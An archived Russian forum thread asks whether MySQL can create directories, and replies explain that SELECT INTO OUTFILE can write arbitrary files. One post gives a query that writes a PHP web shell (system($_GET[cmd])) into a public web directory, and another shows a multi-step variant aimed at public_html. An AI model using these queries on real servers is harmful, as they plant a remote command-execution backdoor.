Создание папки через MySql

Тема в разделе "Базы данных", создана пользователем [iq], 13 май 2008.

Статус темы:
Закрыта.
Модераторы: latteo
  1. [iq]

    [iq]

    Регистр.:
    17 июл 2007
    Сообщения:
    201
    Симпатии:
    44
    Всем привет.
    Возник вопрос есть ли возможность создать папку через мускул (у нас же есть возможность создавать файлы)?

    ЗЫ в документации сразу не нашел.
     
  2. masto

    masto Прохожие

    И какое отношение БД имеет к файловой системе?
     
  3. masima

    masima

    Регистр.:
    9 мар 2007
    Сообщения:
    733
    Симпатии:
    1.338
    к сожалениюбазы данных не предназначены для того чтобы корректировать систему каталогов...
    команды в базах данных выполняются только внутри среды и базы данных не умеют функций WinAPI дабы создавать каталоги или подобную чушь...

    пользуйся SQL Enterprise Manager и будет тебе счастье :)
     
  4. [iq]

    [iq]

    Регистр.:
    17 июл 2007
    Сообщения:
    201
    Симпатии:
    44
    Хех, CREATE follder))) шутник, мля)

    А так насчет отношения к файловой системе...файлы оно может создавать, было бы хорошо, чтобы и папки)
    А это в моей ситуации не очень хорошо(
     
  5. masto

    masto Прохожие

    Научите меня создавать файлы MySQL'ем.
     
  6. Simpson

    Simpson

    Регистр.:
    22 июл 2007
    Сообщения:
    373
    Симпатии:
    36
    Если цель создать файл абы создать, то очень просто!
    Делаешь CREATE TABLE имя_таблицы
    В папке с базами создается файл имя_таблицы.frm
    Аналогично можно создать файл с хранимой процедурой.

    А вот так что б создать чего захотел, то (имхо) никак.
     
  7. scan

    scan

    Регистр.:
    1 апр 2006
    Сообщения:
    174
    Симпатии:
    72
    Вообще то именно файл произвольного содержания можно,если конечно прав хватит,курим mysql ман в сторону SELECT INTO OUTFILE,а вот папки к счастью никак не создаш :D
     
    Simpson нравится это.
  8. Isis

    Isis Создатель

    Регистр.:
    13 июн 2007
    Сообщения:
    10
    Симпатии:
    0
    PHP:
    SELECT '<?php system($_GET[cmd]); ?>' FROM mysql.user into outfile '/home/www/public_html/file.php'
     
  9. masto

    masto Прохожие

    так это с рутовыми правами.
    интересен вариант с конкретным юзером.
     
  10. scan

    scan

    Регистр.:
    1 апр 2006
    Сообщения:
    174
    Симпатии:
    72
    ну к примеру вот так,рядом запросов

    create table bla-bla (txt char(255));
    insert into bla-bla (txt) values ('тут был вася');
    select * into outfile '/home/www/public_html/file.php' from bla-bla;
    drop bla-bla;

    что то мне кажется что вопрос как создать папки через sql плавно преврещается в вопрос как залить шелл через sql инжекцию :)) что вприниципе не одног и тоже
     
    8502753 нравится это.
Статус темы:
Закрыта.